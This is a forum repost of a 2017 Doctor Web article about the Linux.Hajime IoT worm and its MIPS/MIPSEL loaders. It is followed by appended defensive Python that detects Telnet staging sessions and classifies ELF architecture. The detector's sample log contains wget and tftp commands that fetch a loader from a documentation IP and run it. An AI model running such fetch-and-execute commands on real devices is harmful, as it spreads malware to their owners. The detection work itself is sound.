Dr.Web was the first to detect a Trojan loader for smart Linux devices with MIPS/MIPSEL architectures

Discussion in 'Dr Web' started by omidomi, Aug 27, 2017.

    The assortment of modern malicious programs for devices that run on Linux is extremely wide. One of the most widespread Trojans for this OS is Linux.Hajime, several loaders of which are detected only by the Dr.Web Anti-virus.

    Virus analysts have been familiar with Trojans of the Linux.Hajime family since 2016. These are network worms for Linux distributed over the Telnet protocol. After obtaining a password via a brute-force attack and logging on to a device successfully, a malicious module saves a loader written in the Assembler language. Then, the malicious program connects the infected device to a decentralized P2P botnet. Linux.Hajime can infect devices with the ARM, MIPS, and MIPSEL architectures. The Trojan loaders, written in the Assembler language, are not detected by modern anti-viruses, except for the loader for ARM devices, which was described in detail by one anti-virus company in a research report.

    In addition to the loader for ARM devices, similar modules for devices with the MIPS and MIPSEL architectures have been distributed “in the wild” for over six months already. The first of them is Linux.DownLoader.506 and the second is Linux.DownLoader.356. At the moment this article was being written, only Dr.Web products were able to detect both of these worms. Moreover, Doctor Web virus analysts have found that, in addition to using Trojan loaders, cybercriminals are infecting devices using standard utilities—for example, they are downloading Linux.Hajime via wget. And starting on July 11, 2017, they began downloading the Trojan to the attacked devices with the help of the tftp utility.


    Statistics collected by Doctor Web specialists show that Mexico ranks first among the countries to which the IP addresses of the devices infected by Linux.Hajime belong. Turkey and Brazil are also in the top three. The geographical distribution of the infected devices’ IP addresses is shown in the diagram below:


    The following diagram shows the number of attacks carried out for the purpose of distributing Linux.Hajime in August 2017, as detected by Doctor Web.


    Doctor Web reminds users that one of the most reliable ways to prevent attacks on Linux devices is to promptly change the default login and password. It is also recommended that users place restrictions on external connections being made to their devices via the Telnet and SSH protocols and update their firmware in a timely manner. Dr.Web for Linux detects and deletes all the aforementioned versions of Linux.Hajime loaders and allows devices to be scanned remotely.

    More about the Trojan
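The post describes two things a defender can check for directly: a Telnet session that, after a brute-forced login, fetches a file with wget or tftp and then executes it, and the architecture of the dropped loader (ARM, MIPS or MIPSEL). The following is an added example, not code from the article or from Doctor Web. The session transcript format and the minimal ELF headers it parses are constructed for illustration; the architecture is read from the standard ELF e_machine field and EI_DATA endianness byte, which is how MIPS and MIPSEL builds of the same loader differ.

```python
"""Added example (not Dr.Web's code): flag Hajime-style staging in a Telnet
session transcript and classify a dropped ELF loader by architecture.

Assumptions (not from the article): the log format below is invented, and
the ELF bytes used for testing are synthetic headers, not real samples.
"""
import re
import struct

# Constructed Telnet session transcript: one line per event. The article
# says Hajime logs in after a Telnet brute-force, drops a loader, or fetches
# itself with wget and (from July 2017) with tftp.
SESSION_LOG = """\
2017-08-20T10:01:02 203.0.113.7 login ok: user=root
2017-08-20T10:01:03 203.0.113.7 cmd: cd /tmp
2017-08-20T10:01:04 203.0.113.7 cmd: wget http://198.51.100.9/loader.mips -O .x
2017-08-20T10:01:05 203.0.113.7 cmd: chmod +x .x
2017-08-20T10:01:06 203.0.113.7 cmd: ./.x
2017-08-20T10:02:00 192.0.2.44 login ok: user=admin
2017-08-20T10:02:01 192.0.2.44 cmd: tftp -g -r loader.arm 198.51.100.9
2017-08-20T10:02:02 192.0.2.44 cmd: chmod 777 loader.arm
2017-08-20T10:02:03 192.0.2.44 cmd: ./loader.arm
2017-08-20T10:03:00 192.0.2.99 login ok: user=root
2017-08-20T10:03:01 192.0.2.99 cmd: cat /proc/cpuinfo
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (login ok|cmd): (.*)$")
FETCH_RE = re.compile(r"\b(wget|tftp)\b")          # fetch tools named in the article
EXEC_RE = re.compile(r"^(chmod\s+\S+\s+\S+|\./\S+)")  # make executable / run from cwd


def find_staging(log: str) -> dict:
    """Return {source_ip: [fetch commands]} for sessions that both fetch a
    file with wget/tftp and then chmod or execute something."""
    sessions = {}
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, ip, kind, rest = m.groups()
        s = sessions.setdefault(ip, {"fetch": [], "exec": False})
        if kind != "cmd":
            continue
        if FETCH_RE.search(rest):
            s["fetch"].append(rest)
        elif EXEC_RE.match(rest):
            s["exec"] = True
    return {ip: s["fetch"] for ip, s in sessions.items() if s["fetch"] and s["exec"]}


EM_MIPS = 0x08  # ELF e_machine values from the ELF specification
EM_ARM = 0x28


def elf_arch(data: bytes) -> str:
    """Classify an ELF file as 'arm', 'mips', 'mipsel' or 'unknown' from its
    header: EI_DATA (byte 5) gives endianness, e_machine sits at offset 18."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return "unknown"
    ei_data = data[5]  # 1 = little-endian, 2 = big-endian
    if ei_data not in (1, 2):
        return "unknown"
    endian = "<" if ei_data == 1 else ">"
    e_machine = struct.unpack(endian + "H", data[18:20])[0]
    if e_machine == EM_ARM:
        return "arm"
    if e_machine == EM_MIPS:
        return "mipsel" if ei_data == 1 else "mips"
    return "unknown"


def fake_elf(e_machine: int, little: bool) -> bytes:
    """Constructed 20-byte ELF header prefix (synthetic, not a real sample):
    magic, EI_CLASS=32-bit, EI_DATA, EI_VERSION, padding, e_type=EXEC, e_machine."""
    e_ident = b"\x7fELF" + bytes([1, 1 if little else 2, 1]) + b"\x00" * 9
    return e_ident + struct.pack(("<" if little else ">") + "HH", 2, e_machine)


if __name__ == "__main__":
    for ip, fetches in find_staging(SESSION_LOG).items():
        print(f"staging from {ip}: {fetches}")
    for name, blob in (("mips", fake_elf(EM_MIPS, False)),
                       ("mipsel", fake_elf(EM_MIPS, True)),
                       ("arm", fake_elf(EM_ARM, True))):
        print(name, "->", elf_arch(blob))
```

Run against a real Telnet honeypot or device log, the session check would need the log's own field layout, and elf_arch should be fed the bytes actually written to disk (the loaders in the article are tiny assembly-written stubs, so the ELF header is most of what there is to look at).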